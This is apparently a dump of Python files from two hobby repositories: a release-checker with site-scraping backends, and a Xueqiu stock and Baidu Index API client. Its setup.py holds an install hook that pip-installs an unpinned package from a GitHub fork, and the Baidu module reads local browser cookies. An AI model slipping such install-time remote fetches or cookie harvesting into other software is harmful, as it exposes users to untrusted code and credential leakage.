opts['proxy'] = re.split('://', args.proxy)
if args.mode:
opts['mode'] = args.mode
def working(self):
''' get content from queue. '''
while True:
obj = self.q.get()
obj.get_info()
self.q.task_done()
def running(self, *args):
''' Mutilthreads test: 1, 569s; 5, 107s; 10, 54s; 15, 37s
create threads, and put data to queue. '''
for i in range(opts['thread_num']):
t = Thread(target=self.working, args=())
t.setDaemon(True)
t.start()
for item in args:
self.q.put(item)
self.q.join()
@asyncio.coroutine
def progress(self, coros):
for obj in tqdm.tqdm(asyncio.as_completed(coros), total=len(coros)):
yield from obj
def interrupt(self):
for task in asyncio.Task.all_tasks():
task.cancel()
if __name__ == "__main__":
tools = Helper()
objlist = []
for i in tools.inputs():
if opts['mode'] == 'aio':
objlist.append(CheckerAIO(*i))
else:
objlist.append(Checker(*i))
try:
if opts['mode'] == 'thread':
tools.running(*objlist)
else:
global semaphore
semaphore = asyncio.Semaphore(opts['thread_num'])
loop = asyncio.get_event_loop()
            loop.add_signal_handler(signal.SIGINT, tools.interrupt)  # catch SIGINT so pending tasks get cancelled
tasks = [i.get_info() for i in objlist]
loop.run_until_complete(tools.progress(tasks))
except (KeyboardInterrupt, asyncio.CancelledError, urllib.error.URLError):
pass
tools.output(1)
for obj in objlist:
obj.output()
tools.output()
```
#### File: checker/backends/arch_cgit.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class Arch_cgitBackend(BaseBackend):
"""for projects hosted on archlinux.org"""
name = 'Arch CGit'
domain = 'git.archlinux.org'
example = 'https://git.archlinux.org/pacman.git'
def __init__(self, url):
super(Arch_cgitBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return [self._url, self._url + '/log/']
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("substring(//div[@class='content']//tr[@class='nohover'][3]/following::*/td[4]/span/@title, 1, 19)", ""),
("substring(//tr[2]/td[1]/span/@title, 1, 19)",
"//tr[2]/td[2]/a/@href")]
@classmethod
def isrelease(cls, url):
if cls.domain in url and 'log' in url:
return False
else:
return True
```
#### File: checker/backends/cpan.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class CpanBackend(BaseBackend):
"""for projects hosted on cpan.org"""
name = 'CPAN'
domain = 'cpan.org'
example = 'http://search.cpan.org/dist/perl'
def __init__(self, url):
super(CpanBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return [self._url]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//div[3]//tr[1]/td[4]/small/text()", ""), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/jetbrains.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class JetbrainsBackend(BaseBackend):
"""for projects hosted on jetbrains.com"""
name = 'JetBrains'
domain = 'www.jetbrains.com'
example = 'https://www.jetbrains.com/idea/'
p = { # product
'idea': 'IIC', # IIU
'pycharm-edu': 'PCC',
'pycharm': 'PCP',
'phpstorm': 'PS',
'webstorm': 'WS',
'ruby': 'RM',
'objc': 'AC',
'clion': 'CL',
'datagrip': 'DG',
'rider': 'RD'
}
def __init__(self, url):
super(JetbrainsBackend, self).__init__()
self._url = url
self._rule_type = "json"
if self.domain in self._url:
self.pk = [self.p[i] for i in self.p.keys()
if i in self._url][0] # product key
def get_urls(self, branch=None):
json_url = 'https://data.services.jetbrains.com/products/releases' \
'?code=%(code)s&latest=true&type=%(branch)s'
return json_url % {'code': self.pk, 'branch': branch}, # release|eap
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("['%s'][0]['date']" % self.pk, ""), ("", "")]
def _post_json(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
time = eval("self.resp.json()%s" % rules[0])
return self._process_data(time), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/nvidia.py
```python
from checker.backends import BaseBackend
from checker import logger
import re
log = logger.getLogger(__name__)
class NvidiaBackend(BaseBackend):
"""for projects hosted on nvidia.com"""
name = 'NVIDIA'
domain = 'nvidia.com'
example = 'http://http.download.nvidia.com/XFree86/Linux-x86_64'
def __init__(self, url):
super(NvidiaBackend, self).__init__()
self._url = url
self._rule_type = "regex"
def get_urls(self, branch=None):
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("\d{2}-\w{3}-\d{4}", ""), ("", "")]
def _post_regex(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
time = re.findall(rules[0], self.resp.text)
return self._process_data(time), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/packagist.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class PackagistBackend(BaseBackend):
"""for projects hosted on packagist.org"""
name = 'Packagist'
domain = 'packagist.org'
example = 'https://packagist.org/packages/phpunit/php-code-coverage'
def __init__(self, url):
super(PackagistBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
# https://packagist.org/p/%(user)s/%(name)s.json
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//span[@class='release-date']/text()",
"//span[@class='source-reference']/text()"), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/pagure.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class PagureBackend(BaseBackend):
"""for projects hosted on pagure.io"""
name = 'Pagure'
domain = 'pagure.io'
example = 'https://pagure.io/pagure'
def __init__(self, url):
super(PagureBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return ['https://releases.pagure.org/%s/' % self._url.split('/')[-1],
'%s/commits/%s' % (self._url, branch)]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//td[3][contains(text(), '-')]/text()", ""),
("//h5/a//span/@title", "//div[1]/h5/a/@href")]
@classmethod
def isrelease(cls, url):
if cls.domain in url and 'commits' in url:
return False
else:
return True
```
#### File: checker/backends/rubygems.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class RubygemsBackend(BaseBackend):
"""for projects hosted on rubygems.org"""
name = 'Rubygems'
domain = 'rubygems.org'
example = 'https://rubygems.org/gems/bio'
def __init__(self, url):
super(RubygemsBackend, self).__init__()
self._url = url
self._rule_type = "json"
def get_urls(self, branch=None):
return ['http://rubygems.org/api/v1/versions/%(name)s.json' % {
'name': self._url.split('/')[-1]}]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("['created_at']", ""), ("", "")]
def _post_json(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
times = [i['created_at'] for i in self.resp.json()]
return self._process_data(times), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/wps.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class WpsBackend(BaseBackend):
"""for projects hosted on wps-community.org"""
name = 'WPS Community'
domain = 'wps-community.org'
example = 'http://wps-community.org/downloads'
def __init__(self, url):
super(WpsBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, 'wps-office'))
return [("substring(//h2/small/text(), 2, 10)", ""), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: repo-checker/example/taobao_scrapy.py
```python
from scrapy.spiders import CrawlSpider
from scrapy.http import Request
from tutorial.items import TaobaoItem
import json
class TaobaoSpider(CrawlSpider):
name = "taobao"
allowed_domains = ["taobao.com"]
start_urls = ["https://s.taobao.com/list?seller_type=taobao&json=on"]
def start_requests(self):
for url in self.start_urls:
yield Request(url, self.parse_item, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux; rv:47.0) Gecko/20100101 Firefox/47.0"
})
def parse_item(self, response):
d = json.loads(response.body.decode())
if 'common' in d['mods']['nav']['data']:
for i in d['mods']['nav']['data']['common'][0]['sub']:
url = self.start_urls[0] + "&cat=%s" % i['value']
yield Request(url, callback=self.parse_item)
else:
output, filename = '', ''
pv = d['mods']['pager']['data']['currentPage'] * d['mods']['pager']['data']['pageSize']
url = self.start_urls[0] + "&cat=%s&s=%s" % (
d['mods']['nav']['data']['breadcrumbs']['catpath'][-1]['value'],
pv)
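            # `s` appears to be taobao's result offset: currentPage * pageSize
            # points at the first item of the next page, so each parsed page
            # schedules a request for the one after it.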
for item in d['mods']['itemlist']['data']['auctions']:
output += "%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n" % (
item['category'],
item['user_id'],
item['nick'],
item['nid'],
item['title'],
item['item_loc'],
item['reserve_price'],
item['view_price'],
item['detail_url'],
item['shopLink'])
for i in d['mods']['nav']['data']['breadcrumbs']['catpath']:
filename += '%s.'%i['name']
with open(filename.replace('/','_')+'csv', 'a+') as f:
f.write(output)
yield Request(url, callback=self.parse_item)
```
#### File: repo-checker/example/xz2rpm.py
```python
import os
import sys
import re
import json
import time
import argparse
class Package:
def __init__(self):
self.opts = {
'input_file': '',
'author': '',
'mail': ''
}
self.helper()
self.data = self.openfile(self.opts['input_file'])
self.pkg = {
'pkgbase': '',
'pkgname': '',
'pkgver': '',
'pkgrel': '',
'epoch': '',
'pkgdesc': '',
'arch': '',
'url': '',
'license': '',
'groups': '',
'depends': '',
'optdepends': '',
'makedepends': '',
'checkdepends': '',
'provides': '',
'conflicts': '',
'replaces': '',
'backup': '',
'options': '',
'install': '',
'changelog': '',
'source': '',
'noextract': '',
'prepare': '',
'build': '',
'check': '',
'package': ''
}
self.pkg_dict = {
'"': '',
"'": '',
'$pkgname': self.pkg['pkgname'],
'$startdir': '%{_topdir}',
'$srcdir': '%{_builddir}',
'$pkgdir': '%{buildroot}'
}
def openfile(self, filename):
with open(filename, 'r') as fs:
content = fs.read()
return content
    def _tojson(self, data):
        # TODO
        return json.loads(data)  # json.loads() dropped its encoding argument; str input is fine
def parse(self, item):
real_item = None
        patterns = [r'=\((.*?)\)', r'=(.*)', r'\(\)\s*\{(.*)\}']
for i in patterns:
pattern = item + i
if i == '=(.*)':
val = re.compile(pattern)
else:
val = re.compile(pattern, re.S)
if not val.search(self.data):
continue
else:
self.pkg[item] = val.search(self.data).groups()[0]
real_item = item
break
return real_item
def replace_words(self, text, word_dict):
''' https://segmentfault.com/q/1010000002474308 '''
yo = re.compile('|'.join(map(re.escape, word_dict)))
def translate(match):
return word_dict[match.group(0)]
return yo.sub(translate, text)
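    # A minimal sketch of what replace_words does (illustrative input only):
    #   replace_words('cp $srcdir/f $pkgdir/f',
    #                 {'$srcdir': '%{_builddir}', '$pkgdir': '%{buildroot}'})
    #   -> 'cp %{_builddir}/f %{buildroot}/f'
    # A single alternation built from re.escape'd keys substitutes every token
    # in one pass, so earlier replacements cannot be rewritten by later ones.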
    def get_item(self):
        list(map(self.parse, self.pkg))
        # pkg_dict was built with an empty pkgname at __init__ time, so refresh it here
        self.pkg_dict['$pkgname'] = self.pkg['pkgname']
        for i in self.pkg:
            self.pkg[i] = self.replace_words(self.pkg[i], self.pkg_dict)
def output(self):
self.get_item()
author = self.opts['author']
email = self.opts['mail']
date = time.strftime('%a %b %d %Y', time.localtime())
content = '''%global debug_package %nil
Name: {name}
Epoch: {epoch}
Version: {ver}
Release: {rel}%?dist
Summary: {desc}
Group: {group}
License: {license}
URL: {url}
Source0: {src}
BuildArch: {arch}
BuildRequires: {makereq}
Requires: {req}
Recommends: {optreq}
Provides: {prov}
Conflicts: {conf}
Obsoletes: {repl}
%description
{desc}
%prep
%setup -q
{prep}
%build
%configure
make %?_smp_mflags
{build}
%install
%make_install
{install}
%check
{check}
%post
/bin/touch --no-create %_datadir/icons/hicolor &>/dev/null ||:
/usr/bin/update-desktop-database -q ||:
%postun
if [ $1 -eq 0 ]; then
/bin/touch --no-create %_datadir/icons/hicolor &>/dev/null ||:
/usr/bin/gtk-update-icon-cache -f -t -q %_datadir/icons/hicolor ||:
fi
/usr/bin/update-desktop-database -q ||:
%posttrans
/usr/bin/gtk-update-icon-cache -f -t -q %_datadir/icons/hicolor ||:
%files
%defattr(-,root,root,-)
%doc README
%license LICENSE
%changelog
* {date} {author} <{email}> - {ver}-{rel}
- '''.format(
name=self.pkg['pkgname'],
epoch=self.pkg['epoch'],
ver=self.pkg['pkgver'],
rel=self.pkg['pkgrel'],
desc=self.pkg['pkgdesc'],
group=self.pkg['groups'],
license=self.pkg['license'],
url=self.pkg['url'],
src=self.pkg['source'],
arch=self.pkg['arch'],
makereq=self.pkg['makedepends'],
req=self.pkg['depends'],
optreq=self.pkg['optdepends'],
prov=self.pkg['provides'],
conf=self.pkg['conflicts'],
repl=self.pkg['replaces'],
prep=self.pkg['prepare'],
build=self.pkg['build'],
install=self.pkg['package'],
check=self.pkg['check'],
date=date,
author=author,
email=email
)
print(content)
def helper(self):
''' display help information.'''
parser = argparse.ArgumentParser(description='PKGBUILD translate to Spec.')
parser.add_argument('-f', '--file', metavar='PATH', type=str,
dest='files', action='store', default='PKGBUILD',
help='PKGBUILD file'
)
parser.add_argument('-a', '--author', metavar='NAME', type=str,
dest='author', action='store', default='<NAME>',
help='author of package'
)
parser.add_argument('-m', '--mail', metavar='MAIL', type=str,
dest='mail', action='store', default='<EMAIL>',
help='email address of author'
)
args = parser.parse_args()
if args.files and os.path.exists(args.files):
self.opts['input_file'] = args.files
elif args.files is not None:
print("xz2rpm: cannot access '{}': No such file or directory"
.format(args.files))
sys.exit()
if args.author:
self.opts['author'] = args.author
if args.mail:
self.opts['mail'] = args.mail
if __name__ == '__main__':
item = Package()
item.output()
``` |
{
"source": "1dot75cm/xueqiu",
"score": 2
} |
#### File: 1dot75cm/xueqiu/setup.py
```python
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
from setuptools.command.install import install
from subprocess import getoutput
import sys
import re
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['-v']
self.test_suite = True
def run_tests(self):
import pytest
err_code = pytest.main(self.test_args)
sys.exit(err_code)
class PostInstall(install):
"""run post install."""
pkgs = ' git+https://github.com/1dot75cm/browsercookie@master'
def run(self):
install.run(self)
print(getoutput('pip install'+self.pkgs))
def gendeps(filename):
    with open(filename, 'r', encoding='utf8') as f:
        return [line for line in f.read().splitlines() if line]  # drop blank lines so install_requires stays clean
with open('xueqiu/__init__.py', 'rt', encoding='utf8') as f:
xueqiu = dict(re.findall(r'__(.*?)__ = "(.*?)"', f.read()))
setup(
name=xueqiu['pkgname'],
version=xueqiu['version'],
license=xueqiu['license'],
url=xueqiu['url'],
author=xueqiu['author'],
author_email=xueqiu['email'],
description=xueqiu['descript'],
long_description=open('README.md', encoding='utf8').read(),
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests']),
package_dir={'xueqiu': 'xueqiu'},
include_package_data=True,
platforms='any',
install_requires=gendeps('requirements.txt'),
tests_require=gendeps('requirements-test.txt'),
test_suite="tests",
cmdclass={'install': PostInstall, 'test': PyTest},
keywords=['xueqiu', 'snowball', 'stock', 'api', 'api client', 'wrappers'],
# https://pypi.org/classifiers/
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Utilities'
]
)
```
#### File: xueqiu/tests/test_model_functions.py
```python
import pytest
from xueqiu.model import create_or_refresh_stocks
from xueqiu import news
from xueqiu import search
from xueqiu import Post
def test_search():
# search stock
s = search("中国平安")
assert s['list'][0].name == "中国平安"
# search post
p = search("你了解红利基金吗", query_type="post")
assert isinstance(p['list'][0], Post)
# search user
u = search("红利基金", query_type="user")
assert u['list'][0].name == "红利基金"
def test_news():
assert isinstance(news()['list'][0], Post)
def test_create_or_refresh_stocks():
stocks = ['601318', '000333', '00700', 'TSLA', 'RHT']
s = create_or_refresh_stocks(stocks)
assert s[0].name == "中国平安"
assert s[1].name == "美的集团"
assert s[2].name == "腾讯控股"
assert s[3].name == "特斯拉"
assert s[4].name == "红帽"
```
#### File: xueqiu/tests/test_utils_module.py
```python
import pytest
from xueqiu import api
from xueqiu import utils
from requests.cookies import cookielib
def test_get_cookies():
cj = utils.get_cookies()
assert isinstance(cj, cookielib.LWPCookieJar)
assert cj.filename == api.cookie_file
def test_get_session():
sess = utils.get_session()
resp = sess.get(api.prefix)
assert resp.ok
def test_clean_html():
html = "<span><a href=''>Hello</a></span>"
assert utils.clean_html(html) == 'Hello'
def test_check_symbol():
stock = utils.check_symbol(601318)
assert stock == "SH601318"
stock = utils.check_symbol('000651')
assert stock == "SZ000651"
stock = utils.check_symbol('00700')
assert stock == "00700"
stock = utils.check_symbol('HUYA')
assert stock == "HUYA"
def test_exrate():
ex = utils.exrate("2019-01-10", "EUR")
assert ex == [7.8765, 7.8443]
ex = utils.exusd(date="2019-01-10")
assert ex == [6.816, 6.8526]
ex = utils.exhkd("2019-01-10")
assert ex == [0.86959, 0.87419]
```
#### File: xueqiu/xueqiu/baidu.py
```python
from .utils import get_cookies
from .utils import sess
from .utils import str2date
from . import api
import arrow
import requests
import pandas as pd
#https://github.com/Kandy990125/baidu_spider_master
#https://github.com/longxiaofei/spider-BaiduIndex/blob/master/new_spider_without_selenium/config.py
PROVINCE_CODE = {
'山东':901, '贵州':902, '江西':903, '重庆':904, '内蒙古':905,
'湖北':906, '辽宁':907, '湖南':908, '福建':909, '上海':910,
'北京':911, '广西':912, '广东':913, '四川':914, '云南':915,
'江苏':916, '浙江':917, '青海':918, '宁夏':919, '河北':920,
'黑龙江':921, '吉林':922, '天津':923, '陕西':924, '甘肃':925,
'新疆':926, '河南':927, '安徽':928, '山西':929, '海南':930,
'台湾':931, '西藏':932, '香港':933, '澳门':934, '全国':0}
CITY_CODE = {
'重庆市':'11', '上海市':'57', '北京市':'514', '天津市':'164', '香港区':'663', '澳门区':'664',
    # Shandong (山东)
'济南': '1', '滨州': '76', '青岛': '77', '烟台': '78', '临沂': '79', '潍坊': '80',
'淄博': '81', '东营': '82', '聊城': '83', '菏泽': '84', '枣庄': '85', '德州': '86',
'威海': '88', '济宁': '352', '泰安': '353', '莱芜': '356', '日照': '366',
    # Guizhou (贵州)
'贵阳': '2', '黔南': '3', '六盘水': '4', '遵义': '59', '黔东南': '61',
'铜仁': '422', '安顺': '424', '毕节': '426', '黔西南': '588',
    # Jiangxi (江西)
'南昌': '5', '九江': '6', '鹰潭': '7', '抚州': '8', '上饶': '9', '赣州': '10',
'吉安': '115', '萍乡': '136', '景德镇': '137', '新余': '246', '宜春': '256',
    # Inner Mongolia (内蒙古)
'呼和浩特': '20', '包头': '13', '鄂尔多斯': '14', '巴彦淖尔': '15', '乌海': '16',
'阿拉善盟': '17', '锡林郭勒盟': '19', '赤峰': '21', '通辽': '22', '呼伦贝尔': '25',
'乌兰察布': '331', '兴安盟': '333',
    # Hubei (湖北)
'武汉': '28', '黄石': '30', '荆州': '31', '襄阳': '32', '黄冈': '33', '荆门': '34',
'宜昌': '35', '十堰': '36', '随州': '37', '恩施': '38', '鄂州': '39', '咸宁': '40',
'孝感': '41', '仙桃': '42', '天门': '73', '潜江': '74', '神农架': '687',
    # Liaoning (辽宁)
'沈阳': '150', '大连': '29', '盘锦': '151', '鞍山': '215', '朝阳': '216', '锦州': '217',
'铁岭': '218', '丹东': '219', '本溪': '220', '营口': '221', '抚顺': '222', '阜新': '223',
'辽阳': '224', '葫芦岛': '225',
    # Hunan (湖南)
'长沙': '43', '岳阳': '44', '衡阳': '45', '株洲': '46', '湘潭': '47', '益阳': '48',
'郴州': '49', '湘西': '65', '娄底': '66', '怀化': '67', '常德': '68', '张家界': '226',
'永州': '269', '邵阳': '405',
    # Fujian (福建)
'福州': '50', '莆田': '51', '三明': '52', '龙岩': '53', '厦门': '54', '泉州': '55',
'漳州': '56', '宁德': '87', '南平': '253',
    # Guangxi (广西)
'南宁': '90', '柳州': '89', '桂林': '91', '贺州': '92', '贵港': '93', '玉林': '118',
'河池': '119', '北海': '128', '钦州': '129', '防城港': '130', '百色': '131',
'梧州': '132', '来宾': '506', '崇左': '665',
    # Guangdong (广东)
'广州': '95', '深圳': '94', '东莞': '133', '云浮': '195', '佛山': '196', '湛江': '197',
'江门': '198', '惠州': '199', '珠海': '200', '韶关': '201', '阳江': '202', '茂名': '203',
'潮州': '204', '揭阳': '205', '中山': '207', '清远': '208', '肇庆': '209', '河源': '210',
'梅州': '211', '汕头': '212', '汕尾': '213',
    # Sichuan (四川)
'成都': '97', '宜宾': '96', '绵阳': '98', '广元': '99', '遂宁': '100', '巴中': '101',
'内江': '102', '泸州': '103', '南充': '104', '德阳': '106', '乐山': '107', '广安': '108',
'资阳': '109', '自贡': '111', '攀枝花': '112', '达州': '113', '雅安': '114', '眉山': '291',
'甘孜': '417', '阿坝': '457', '凉山': '479',
    # Yunnan (云南)
'昆明': '117', '玉溪': '123', '楚雄': '124', '大理': '334', '昭通': '335', '红河': '337',
'曲靖': '339', '丽江': '342', '临沧': '350', '文山': '437', '保山': '438', '普洱': '666',
'西双版纳': '668', '德宏': '669', '怒江': '671', '迪庆': '672',
    # Jiangsu (江苏)
'南京': '125', '苏州': '126', '无锡': '127', '连云港': '156', '淮安': '157',
'扬州': '158', '泰州': '159', '盐城': '160', '徐州': '161', '常州': '162',
'南通': '163', '镇江': '169', '宿迁': '172',
    # Zhejiang (浙江)
'杭州': '138', '丽水': '134', '金华': '135', '温州': '149', '台州': '287', '衢州': '288',
'宁波': '289', '绍兴': '303', '嘉兴': '304', '湖州': '305', '舟山': '306',
    # Qinghai (青海)
'西宁': '139', '海西': '608', '海东': '652', '玉树': '659', '海南': '676', '海北': '682',
'黄南': '685', '果洛': '688',
    # Ningxia (宁夏)
'银川': '140', '吴忠': '395', '固原': '396', '石嘴山': '472', '中卫': '480',
    # Hebei (河北)
'石家庄': '141', '衡水': '143', '张家口': '144', '承德': '145', '秦皇岛': '146',
'廊坊': '147', '沧州': '148', '保定': '259', '唐山': '261', '邯郸': '292', '邢台': '293',
    # Heilongjiang (黑龙江)
'哈尔滨': '152', '大庆': '153', '伊春': '295', '大兴安岭': '297', '黑河': '300',
'鹤岗': '301', '七台河': '302', '齐齐哈尔': '319', '佳木斯': '320', '牡丹江': '322',
'鸡西': '323', '绥化': '324', '双鸭山': '359',
    # Jilin (吉林)
'长春': '154', '四平': '155', '辽源': '191', '松原': '194', '吉林': '270', '通化': '407',
'白山': '408', '白城': '410', '延边': '525',
    # Shaanxi (陕西)
'西安': '165', '铜川': '271', '安康': '272', '宝鸡': '273', '商洛': '274', '渭南': '275',
'汉中': '276', '咸阳': '277', '榆林': '278', '延安': '401',
    # Gansu (甘肃)
'兰州': '166', '庆阳': '281', '定西': '282', '武威': '283', '酒泉': '284', '张掖': '285',
'嘉峪关': '286', '平凉': '307', '天水': '308', '白银': '309', '金昌': '343',
'陇南': '344', '临夏': '346', '甘南': '673',
    # Xinjiang (新疆)
'乌鲁木齐': '467', '石河子': '280', '吐鲁番': '310', '昌吉': '311', '哈密': '312',
'阿克苏': '315', '克拉玛依': '317', '博尔塔拉': '318', '阿勒泰': '383', '喀什': '384',
'和田': '386', '巴音郭楞': '499', '伊犁': '520', '塔城': '563', '克孜勒苏柯尔克孜': '653',
'五家渠': '661', '阿拉尔': '692', '图木舒克': '693',
    # Henan (河南)
'郑州': '168', '南阳': '262', '新乡': '263', '开封': '264', '焦作': '265', '平顶山': '266',
'许昌': '268', '安阳': '370', '驻马店': '371', '信阳': '373', '鹤壁': '374', '周口': '375',
'商丘': '376', '洛阳': '378', '漯河': '379', '濮阳': '380', '三门峡': '381', '济源': '667',
    # Anhui (安徽)
'合肥': '189', '铜陵': '173', '黄山': '174', '池州': '175', '宣城': '176', '巢湖': '177',
'淮南': '178', '宿州': '179', '六安': '181', '滁州': '182', '淮北': '183', '阜阳': '184',
'马鞍山': '185', '安庆': '186', '蚌埠': '187', '芜湖': '188', '亳州': '391',
    # Shanxi (山西)
'太原': '231', '大同': '227', '长治': '228', '忻州': '229', '晋中': '230', '临汾': '232',
'运城': '233', '晋城': '234', '朔州': '235', '阳泉': '236', '吕梁': '237',
    # Hainan (海南)
'海口': '239', '万宁': '241', '琼海': '242', '三亚': '243', '儋州': '244', '东方': '456',
'五指山': '582', '文昌': '670', '陵水': '674', '澄迈': '675', '乐东': '679', '临高': '680',
'定安': '681', '昌江': '683', '屯昌': '684', '保亭': '686', '白沙': '689', '琼中': '690',
    # Tibet (西藏)
'拉萨': '466', '日喀则': '516', '那曲': '655', '林芝': '656', '山南': '677', '昌都': '678',
'阿里': '691'}
AREAS = PROVINCE_CODE.copy()
AREAS.update(CITY_CODE)
sess.cookies = requests.cookies.merge_cookies(sess.cookies,
get_cookies('.baidu.com', lazy=False))
class BaseIndex:
"""base index class."""
def __init__(self):
pass
@staticmethod
def get_date_range(start, end, period='year'):
"""date range is one year."""
start = arrow.get(start)
end = arrow.get(end)
for i in arrow.Arrow.range(period, start, end):
dt = {'year':i.shift(years=1), 'quarter':i.shift(quarters=1),
'month':i.shift(months=1), 'week':i.shift(weeks=1)}
if i == end: break
tmp = dt[period]>=end and end or dt[period].shift(days=-1)
yield (i, tmp)
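    # Illustrative behaviour: a multi-year span is yielded as closed chunks of
    # at most one `period` each, e.g.
    #   list(BaseIndex.get_date_range('2016-01-01', '2018-06-30'))
    #   -> [(2016-01-01, 2016-12-31), (2017-01-01, 2017-12-31),
    #       (2018-01-01, 2018-06-30)]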
class BaiduIndex(BaseIndex):
"""Baidu search/feed/news index.
Usage::
>>> idx = BaiduIndex()
>>> idx.live('股票,基金','深圳')
>>> idx.search('股票',begin='-3m',area='上海')
    >>> idx.region_distribution('股票','-6w')  # region distribution
    >>> idx.social_attribute('股票','-15d')  # demographic attributes
"""
cookie = None
    def __init__(self, keyword='', begin='-1m', end=None, index='search', area='全国', cookie=''):
        end = end if end is not None else arrow.now()  # evaluate at call time, not at class definition
        self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
        self.start_date = arrow.get(str2date(begin).date())  # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self.index_type = index
self.area = area
self.cookie = cookie or BaiduIndex.cookie
self._key = None
self._uniqid = None
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related baidu index data.
:param keyword: baidu index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:param index: (optional) index type, default is `search`.
value: search, feed, news
:param area: (optional) baidu index by region, default is `全国`.
value: please see `AREAS` variable
:param cookie: (optional) your cookie strings.
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date):
for d in self.get_encrypt_data(st, ed):
encdata = d.get('all') or d
self.end_date = arrow.get(encdata['endDate'])
self._result[d.get('word') or d.get('key')] += \
self.decrypt(self.get_key(), encdata['data'])
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def live(self, keyword, area='全国', *args, **kwargs):
self.__init__(keyword, index='live', area=area, *args, **kwargs)
for d in self.get_encrypt_data():
region = 0 if self.area == '全国' else str(AREAS[self.area])
encdata = d.get('index')[region]
period = [arrow.get(i) for i in encdata['period'].split('|')]
self._result[d.get('key')] += \
self.decrypt(self.get_key(), encdata['_all'])
date_range = arrow.Arrow.range('hour', period[0], period[1])
self._result['date'] = pd.to_datetime([i.datetime for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def region_distribution(self, keyword, *args, **kwargs):
"""region distribution statistics. 地域分布"""
self.__init__(keyword, *args, **kwargs)
params = {'region': AREAS[self.area],
'word': ','.join(self._keywords),
'startDate': self.start_date.format('YYYY-MM-DD'),
'endDate': self.end_date.format('YYYY-MM-DD')}
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_region, params=params, headers=cookie).json()
self.region = {i['key']: {'city':i['city'], 'prov':i['prov'], 'period':i['period']}
for i in resp['data']['region']}
return self.region
def social_attribute(self, keyword, *args, **kwargs):
"""social attribute statistics. 人群属性(年龄分布, 性别分布)"""
self.__init__(keyword, *args, **kwargs)
params = {'wordlist': ','.join(self._keywords),
'startdate': self.start_date.format('YYYYMMDD'),
'enddate': self.end_date.format('YYYYMMDD')}
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_social, params=params, headers=cookie).json()
self.social = {i['word']: {'age':i['str_age'], 'sex':i['str_sex']} for i in resp['data']}
return self.social
def get_encrypt_data(self, start_date=None, end_date=None):
"""get encrypted data."""
idx = {'live': api.baidu_search_live,
'search': api.baidu_search_index,
'feed': api.baidu_feed_index,
'news': api.baidu_news_index}
params = {'word': ','.join(self._keywords)}
if self.index_type == 'live':
params.update({'region': AREAS[self.area]})
else:
params.update({
'area': AREAS[self.area],
'startDate': start_date.format('YYYY-MM-DD'),
'endDate': end_date.format('YYYY-MM-DD')
})
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(idx[self.index_type], params=params, headers=cookie)
#status: 0 ok, 10000 no login, 10002 bad request
data = resp.json()['data']
self._uniqid = data['uniqid']
